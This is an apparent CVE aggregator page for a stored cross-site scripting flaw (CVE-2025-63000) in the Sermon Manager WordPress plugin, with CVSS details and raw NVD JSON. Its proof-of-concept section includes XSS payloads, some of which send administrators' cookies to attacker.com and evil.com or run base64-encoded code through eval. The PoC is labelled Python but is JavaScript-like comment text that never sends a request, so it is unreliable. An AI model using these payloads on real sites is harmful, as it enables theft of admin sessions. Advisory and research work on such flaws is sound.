Security Vulnerability Report
中文
CVE-2025-63000 CVSS 6.5 MEDIUM

CVE-2025-63000

Published: 2025-12-31 09:15:52
Last Modified: 2026-04-23 15:34:56

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpforchurch Sermon Manager sermon-manager-for-wordpress allows Stored XSS.This issue affects Sermon Manager: from n/a through <= 2.30.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Sermon Manager for WordPress <= 2.30.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-63000 Stored XSS PoC for Sermon Manager WordPress Plugin // Target: sermon-manager-for-wordpress <= 2.30.0 // Author: PatchStack // This PoC demonstrates storing malicious JavaScript via sermon creation // Requires low-privilege account (subscriber role) // Step 1: Authenticate with low-privilege account const loginUrl = 'http://target-wordpress.com/wp-login.php'; const credentials = { log: 'attacker_username', pwd: 'attacker_password' }; // Step 2: Create a new sermon with XSS payload in title/description const sermonPayload = { post_type: 'sermon', post_title: '<script>alert(String.fromCharCode(88,83,83))</script>', post_content: '<img src=x onerror=alert(document.cookie)>', action: 'save-post', nonce: 'YOUR_NONCE_VALUE' // Need to obtain valid nonce }; // Step 3: The XSS will execute when admin views the sermon // Payload examples: // - <script>fetch("https://attacker.com/steal?c="+document.cookie)</script> // - <img src=x onerror="document.location='https://evil.com/log?cookie='+document.cookie"> // - <svg onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63000", "sourceIdentifier": "[email protected]", "published": "2025-12-31T09:15:52.317", "lastModified": "2026-04-23T15:34:56.077", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpforchurch Sermon Manager sermon-manager-for-wordpress allows Stored XSS.This issue affects Sermon Manager: from n/a through <= 2.30.0."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en WP for church Sermon Manager permite XSS Almacenado. Este problema afecta a Sermon Manager: desde n/a hasta 2.30.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sermon-manager-for-wordpress/vulnerability/wordpress-sermon-manager-plugin-2-30-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}